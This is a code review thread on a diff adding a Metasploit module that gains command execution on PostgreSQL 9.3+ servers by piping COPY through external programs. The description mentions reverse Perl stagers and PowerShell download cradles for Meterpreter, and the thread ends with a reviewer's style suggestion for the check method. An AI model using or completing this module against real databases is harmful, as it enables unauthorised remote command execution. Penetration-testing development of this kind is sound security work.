modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb

```diff
@@ -0,0 +1,250 @@
+      'Name' => 'PostgreSQL >9.3 Command Execution',
+      'Description' => %q(
+        Installations running Postgres 9.3 and above have functionality which allows for the superuser 
+        and users with 'pg_read_server_files' to pipe to and from an external program using COPY. 
+        This allows arbitary command execution as though you have console access.
+
+        This module attempts to create a new table, then execute system commands in the context of 
+        copying the command output into the table.
+
+        This module should work on all Postgres systems running version 9.3 and above. 
+
+        For Linux & OSX systems, cmd stagers are used such as: cmd/unix/reverse_perl
+
+        For Windows Systems command is placed in the COMMAND parameter, such as a powershell 
+        download cradle for meterpreter
+      ),
+      'Author' => [
+        'Jacob Wilkin', # author of this module
+        'Micheal Cottingham', # the postgres_createlang module that this is based on
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', '<Blogpost on the subject>'],
+        ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
+      ],
+        'PayloadType' => %w(cmd)
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Feb 24 2019'
+    ))
+
+    register_options([
+      Opt::RPORT(5432),
+      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
+      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
+    ])
+
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
+
+  # Return the datastore value of the same name
+  # @return [String] tablename for table to use with command execution
+  def tablename; datastore['TABLENAME']; end
+
+  # Return the datastore value of the same name
+  # @return [String] command to run a custom command on the target
+  def command; datastore['COMMAND']; end
+
+  def postgres_version(version)
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    print_status(version_match['major_version'])
+    print_status(version_match['minor_version'])
+    return version_match['major_version'],version_match['minor_version']
+  end
+
+  def postgres_minor_version(version)
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    version_match['minor_version']
+  end
+
+  def check
+    if vuln_version?
+      Exploit::CheckCode::Appears
```

Comment:
`Exploit::` class prefix is redundant in this context. If you wanted, this method could be golfed further:

```ruby
  def check
    vuln_version? ? CheckCode::Appears : CheckCode::Safe
  end
```

Reply:
Fixed